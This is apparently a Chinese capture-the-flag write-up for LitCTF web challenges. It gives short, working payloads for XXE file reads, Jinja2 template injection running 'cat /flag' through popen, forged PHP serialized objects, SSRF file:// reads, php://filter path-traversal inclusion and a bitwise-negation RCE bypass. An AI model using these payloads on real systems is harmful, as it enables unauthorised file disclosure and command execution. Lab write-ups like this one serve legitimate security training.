Litctf-web

Litctf-web

exx

xxe,

html 复制代码
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///flag" >]><user><username>&xxe;</username>
<password>1</password></user>
一个...池子

ssti,没有过滤

复制代码
{{''.__class__.__mro__[1].__subclasses__()[137].__init__.__globals__['popen']('cat /flag').read()}}
SAS - Serializing Authentication System

反序列化

php 复制代码
<?php

class User {

    public $username="admin";

    public $password="secure_password";

}
$a=new User();
echo base64_encode(serialize($a));

?>
复制代码
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=
浏览器也能套娃?

ssrf

复制代码
file:///flag
高亮主题(划掉)背景查看器

文件包含伪协议

复制代码
POST传
theme=php://filter/convert.base64-encode/resource=../../../../../../../../../../../../../../../../flag

根目录下

百万美元的诱惑

rce

/下

复制代码
?a[]=1&b[]=2&c=2025a

/dollar.php

取反绕过,自增应该也行试了下没过。

$(())为0

$_++也为1也可以应该

${_}=""输出上一次执行结果

( ( ((~ (( ((${_}))))=-1

复制代码
%24((~%24((%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))))))
相关推荐
急速前行Klein5 分钟前
Ubuntu中安装git
linux·git·ubuntu
月忆36413 分钟前
等待组(waitgroup)
前端·爬虫·python
一杯凉白开15 分钟前
硬件工程师口中的取低八位,中八位,高八位是什么意思?
android·网络协议
令狐寻欢16 分钟前
HTML中 的 meta 标签常用属性及其作用
前端·html
番茄憨憨20 分钟前
Android-wifi常用接口,9个里面你看看几个对你有帮助!
android
SynthWriter21 分钟前
Trae 帮我生成了一个贪吃蛇的游戏,好玩儿
前端
消失的旧时光-194330 分钟前
Android 开发中配置 USB 配件模式(Accessory Mode) 配件过滤器的配置
android·java
拂去尘世尘34 分钟前
一文掌握软件分支管理
linux
用户214118326360234 分钟前
dify案例分享-Dify+RSS 聚合 8 大平台实时热点,新闻获取效率飙升 300%
前端
W说编程34 分钟前
Linux与量子计算:面向未来的架构演进
linux·服务器·性能优化·架构·系统架构·量子计算